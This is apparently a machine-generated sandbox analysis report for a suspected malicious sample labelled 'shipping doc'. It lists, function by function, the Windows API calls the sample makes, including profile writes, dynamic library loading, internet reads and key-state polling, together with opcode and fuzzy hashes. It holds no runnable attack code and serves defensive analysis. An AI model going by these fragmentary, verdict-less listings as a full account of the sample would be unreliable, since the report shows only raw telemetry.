                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                              • String ID:
                                                                                              • API String ID: 4136290138-0
                                                                                              • Opcode ID: 69c4cdd8bc3fde9a5600e2f10564f8e7ee682ef35e32860a0db3e2bc128de47c
                                                                                              • Instruction ID: 07a953415e4a6e84f65ea156670234a52263aea1874658e48a2150aeb02f40fd
                                                                                              • Opcode Fuzzy Hash: 69c4cdd8bc3fde9a5600e2f10564f8e7ee682ef35e32860a0db3e2bc128de47c
                                                                                              • Instruction Fuzzy Hash: A1515AB5A01219EFCB14CF68C894AAAB7F8FF89314B158559E909DB360E730E911CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00158BAE
                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00158BDA
                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00158C32
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00158C57
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00158C5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                              • String ID:
                                                                                              • API String ID: 2832842796-0
                                                                                              • Opcode ID: 51454e80188016317b9dea5043bbbc3c1df83b7f895d8210c6df4a11e9c027c6
                                                                                              • Instruction ID: 9f7b196e7ed88b362cabd805598378159f4a3bcf0e772f027e304cf9cf3b4eb4
                                                                                              • Opcode Fuzzy Hash: 51454e80188016317b9dea5043bbbc3c1df83b7f895d8210c6df4a11e9c027c6
                                                                                              • Instruction Fuzzy Hash: 86513835A00619EFCB05DF65C881AAEBBF5FF48314F088458E859AB362DB31ED55CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00168F40
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00168FD0
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00168FEC
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00169032
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00169052
                                                                                                • Part of subcall function 000FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00151043,?,753CE610), ref: 000FF6E6
                                                                                                • Part of subcall function 000FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0013FA64,00000000,00000000,?,?,00151043,?,753CE610,?,0013FA64), ref: 000FF70D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                              • String ID:
                                                                                              • API String ID: 666041331-0
                                                                                              • Opcode ID: 860b5662198bb95fb378977bbea60daf46e142fae332faac90bd57d3b068fa46
                                                                                              • Instruction ID: 2f2c692f775602c35b1eb2f81611cf35050bfeee3fcbef14495b35a768330bb2
                                                                                              • Opcode Fuzzy Hash: 860b5662198bb95fb378977bbea60daf46e142fae332faac90bd57d3b068fa46
                                                                                              • Instruction Fuzzy Hash: D7515A35600245DFCB14DF68C8848EDBBF5FF49314B4981A8E80AAB762DB31ED85CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00176C33
                                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00176C4A
                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00176C73
                                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0015AB79,00000000,00000000), ref: 00176C98
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00176CC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 3688381893-0
                                                                                              • Opcode ID: 474a42f9088c1c0b87fe5d33e2eebc0faeaf42ee9b0e75c9ebe4f07a0972b99f
                                                                                              • Instruction ID: fd09000fb3d1249197755839b88ad93374dc801202fdcb1c158d7719b345cc0d
                                                                                              • Opcode Fuzzy Hash: 474a42f9088c1c0b87fe5d33e2eebc0faeaf42ee9b0e75c9ebe4f07a0972b99f
                                                                                              • Instruction Fuzzy Hash: 7941D435604504AFD725CF38CC58FE97BB5EB0A350F158268F89DA72E0C771AD81DA80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 963382a8eae740d8eb5af73e5e2ad3f05533904e93badad0d7c02846d7c6e385
                                                                                              • Instruction ID: cd8e0e338dd325878959cc66da88e1ec8c25b0fe4e0fd25736d6f95da834a1f7
                                                                                              • Opcode Fuzzy Hash: 963382a8eae740d8eb5af73e5e2ad3f05533904e93badad0d7c02846d7c6e385
                                                                                              • Instruction Fuzzy Hash: 8D41D336A00204AFCB28DF78C981AADB7F5EF89314F154578E615EB392DB31AD51CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 000F9141
                                                                                              • ScreenToClient.USER32(00000000,?), ref: 000F915E
                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 000F9183
                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 000F919D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                              • String ID:
                                                                                              • API String ID: 4210589936-0
                                                                                              • Opcode ID: 9d72e4e767aa0119d8ac173f8fd7ea70c6c570c32faaea1017c047dfd83f76b9
                                                                                              • Instruction ID: 599536b91b612e7d5e691d5e25f19db4565e57e2c5f12e68a7ccc4f1106ab60b
                                                                                              • Opcode Fuzzy Hash: 9d72e4e767aa0119d8ac173f8fd7ea70c6c570c32faaea1017c047dfd83f76b9
                                                                                              • Instruction Fuzzy Hash: 09415071A0861AFBDF199F64C844BFEB774FF05324F208229E529A72D0C7306994DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 001538CB
                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00153922
                                                                                              • TranslateMessage.USER32(?), ref: 0015394B
                                                                                              • DispatchMessageW.USER32(?), ref: 00153955
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00153966
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                              • String ID:
                                                                                              • API String ID: 2256411358-0
                                                                                              • Opcode ID: 2c3c27bb9e2a20da237023ece5adeeb721135b658f47b71be88b2f8f30b3d7ee
                                                                                              • Instruction ID: 38f1b02334eacbd2d3b46121a100642013ad7fa75a4659593de52a000ecc61d9
                                                                                              • Opcode Fuzzy Hash: 2c3c27bb9e2a20da237023ece5adeeb721135b658f47b71be88b2f8f30b3d7ee
                                                                                              • Instruction Fuzzy Hash: 3F31EAB0504385EEEB39CB34D858BB637E4AB0138AF55065DE876CB4A0E7B096CDCB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0015CF38
                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 0015CF6F
                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,0015C21E,00000000), ref: 0015CFB4
                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0015C21E,00000000), ref: 0015CFC8
                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0015C21E,00000000), ref: 0015CFF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 3191363074-0
                                                                                              • Opcode ID: d1ec36b4459d09373a0a8af2c9b2576b228581f86aed924fa8269573408cc231
                                                                                              • Instruction ID: 68af65aaf7168d741a07112e94d40b612b976ea613cebf89b5e2d6234b624db9
                                                                                              • Opcode Fuzzy Hash: d1ec36b4459d09373a0a8af2c9b2576b228581f86aed924fa8269573408cc231
                                                                                              • Instruction Fuzzy Hash: 60318071600305EFDB24DFA5C8849ABBBF9EF14312B10442EF926D6501DB30AD84DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00141915
                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 001419C1
                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 001419C9
                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 001419DA
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001419E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: 9c397b154f809f3e55a13238e13d66b10d6eeb32250a2bc8417aab3054b927dd
                                                                                              • Instruction ID: 8f0f6771c20af4233fee54c3d9f105c6b44d0a34fdb30d28f5ef31a68305e405
                                                                                              • Opcode Fuzzy Hash: 9c397b154f809f3e55a13238e13d66b10d6eeb32250a2bc8417aab3054b927dd
                                                                                              • Instruction Fuzzy Hash: 0D31A271A00219FFCB04CFA8CD99ADE7BB5FB44319F104229F925A72E1C7709994CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00175745
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0017579D
                                                                                              • _wcslen.LIBCMT ref: 001757AF
                                                                                              • _wcslen.LIBCMT ref: 001757BA
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00175816
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 763830540-0
                                                                                              • Opcode ID: 3e985de87a6d1120a9608e623f89f1c5899f00ad148afabac393a174d0368993
                                                                                              • Instruction ID: 6293481757e6ad4da9f415451a325699c0d83d99ef786f7af1f7bf1541e82048
                                                                                              • Opcode Fuzzy Hash: 3e985de87a6d1120a9608e623f89f1c5899f00ad148afabac393a174d0368993
                                                                                              • Instruction Fuzzy Hash: 682165759046189ADB209FA4CC85AEE7BB9FF14724F50C21AFA1DEA1C0E7B099C5CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindow.USER32(00000000), ref: 00160951
                                                                                              • GetForegroundWindow.USER32 ref: 00160968
                                                                                              • GetDC.USER32(00000000), ref: 001609A4
                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 001609B0
                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 001609E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                              • String ID:
                                                                                              • API String ID: 4156661090-0
                                                                                              • Opcode ID: 9d8bc42672f1689895a3472810a4ff54b89cf35ac48201cd1c06dfe4462b5bd8
                                                                                              • Instruction ID: 2c59f3612117cdc29282a5b16dfb3b03d5d000fb34ada475a37f79205726e9b7
                                                                                              • Opcode Fuzzy Hash: 9d8bc42672f1689895a3472810a4ff54b89cf35ac48201cd1c06dfe4462b5bd8
                                                                                              • Instruction Fuzzy Hash: 8B216F35600214AFD704EF65DC85AAEBBF5EF48701F14846CF85AA7752DB70AD44CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0011CDC6
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0011CDE9
                                                                                                • Part of subcall function 00113820: RtlAllocateHeap.NTDLL(00000000,?,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6,?,000E1129), ref: 00113852
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0011CE0F
                                                                                              • _free.LIBCMT ref: 0011CE22
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0011CE31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: fe1f66323585b97cd340666a6cea9140e1534c6ac8b755057a40374c6941ed60
                                                                                              • Instruction ID: 1ca913e422e0c4c6c78887ff5abb46c7247a1e872ce9bf7bc170c4cd8bcd474d
                                                                                              • Opcode Fuzzy Hash: fe1f66323585b97cd340666a6cea9140e1534c6ac8b755057a40374c6941ed60
                                                                                              • Instruction Fuzzy Hash: A80184726422157F272916BA6C89DFF6D6EEFC6BA1315013DF909C7201EB618D9181F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F9693
                                                                                              • SelectObject.GDI32(?,00000000), ref: 000F96A2
                                                                                              • BeginPath.GDI32(?), ref: 000F96B9
                                                                                              • SelectObject.GDI32(?,00000000), ref: 000F96E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                              • String ID:
                                                                                              • API String ID: 3225163088-0
                                                                                              • Opcode ID: 6f26502fbdf8e76887d3eb94c82d80aaf124e4890ef0b0623ff6af4a519e961a
                                                                                              • Instruction ID: 0f695620f9a0c309a9a08a1e1650328e99120c5dd03b7031d38a16b17c0a5b01
                                                                                              • Opcode Fuzzy Hash: 6f26502fbdf8e76887d3eb94c82d80aaf124e4890ef0b0623ff6af4a519e961a
                                                                                              • Instruction Fuzzy Hash: 6A217C70802349FBDB219F24EC287B93BB9BB0032AF51031AF514A69B0D37098D1DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: 2e4e38696b8439fba8df52f8532ce97d4f9e7af90870be196d286ad27598eec4
                                                                                              • Instruction ID: ba232ddc1756aadd39fe7f4cd5789c60907fbf00efb3e1af781ced7945a9ade5
                                                                                              • Opcode Fuzzy Hash: 2e4e38696b8439fba8df52f8532ce97d4f9e7af90870be196d286ad27598eec4
                                                                                              • Instruction Fuzzy Hash: 810196B1641605BBE30855109E42EBB736EAB213A5B808035FD089F293F764ED12C2B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,0010F2DE,00113863,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6), ref: 00112DFD
                                                                                              • _free.LIBCMT ref: 00112E32
                                                                                              • _free.LIBCMT ref: 00112E59
                                                                                              • SetLastError.KERNEL32(00000000,000E1129), ref: 00112E66
                                                                                              • SetLastError.KERNEL32(00000000,000E1129), ref: 00112E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 7f6c54be91254170c25705037c8758156b8bd9a7a2b2655c41b5e8d35852a029
                                                                                              • Instruction ID: 37fe70692fc9eebb1ea1eaedea28da3c79071f31ffa1af573ffa82a67cef650d
                                                                                              • Opcode Fuzzy Hash: 7f6c54be91254170c25705037c8758156b8bd9a7a2b2655c41b5e8d35852a029
                                                                                              • Instruction Fuzzy Hash: 5401CD3264660067C62E77746C45DEB156DABE5775B25403CF429E31D2EF748CE14160
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?,?,0014035E), ref: 0014002B
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?), ref: 00140046
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?), ref: 00140054
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?), ref: 00140064
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0013FF41,80070057,?,?), ref: 00140070
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
